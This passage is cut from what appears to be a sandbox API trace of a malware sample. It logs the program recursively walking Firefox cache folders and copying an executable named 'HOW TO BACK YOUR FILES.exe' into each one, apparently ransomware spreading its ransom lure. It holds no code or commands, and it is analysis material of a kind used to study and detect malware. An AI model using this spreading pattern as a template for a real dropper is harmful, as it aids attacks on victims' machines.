BACK YOUR FILES.exe" [0104.567] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.568] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.568] GetLastError () returned 0x0 [0104.568] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.568] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d8f47a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d8f47a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.568] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.568] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.569] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6" [0104.569] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6" [0104.569] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.569] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.569] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.570] GetLastError () returned 0x0 [0104.570] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.570] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7eaf750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bb21000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb21000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.570] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.570] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.570] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B" [0104.570] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B" [0104.571] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.571] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\b\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.571] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.571] GetLastError () returned 0x0 [0104.572] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.572] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d91a900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d91a900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.572] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.572] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.572] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A" [0104.572] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A" [0104.572] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.572] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\a\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.573] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.573] GetLastError () returned 0x0 [0104.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.573] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d91a900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d91a900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.574] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.574] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.574] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9" [0104.574] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9" [0104.574] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.574] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.575] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.575] GetLastError () returned 0x0 [0104.575] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.575] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d91a900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d91a900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.575] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.575] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.575] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0" [0104.576] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0" [0104.576] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.576] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.576] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.577] GetLastError () returned 0x0 [0104.577] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.577] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e8d330, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6bb47160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb47160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.577] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.577] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.577] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61" [0104.577] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61" [0104.577] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.577] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.578] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.578] GetLastError () returned 0x0 [0104.579] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.579] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7f47cd0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bb47160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb47160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.579] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.579] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.579] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C" [0104.579] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C" [0104.579] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.579] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.580] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.580] GetLastError () returned 0x0 [0104.580] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.580] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7d58af0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bb47160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb47160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.581] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.581] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.581] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10" [0104.581] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10" [0104.581] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.581] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.582] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.582] GetLastError () returned 0x0 [0104.582] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.582] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7f47cd0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bb6d2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb6d2c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.582] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.582] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.582] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8" [0104.583] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8" [0104.583] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.583] CopyFileW 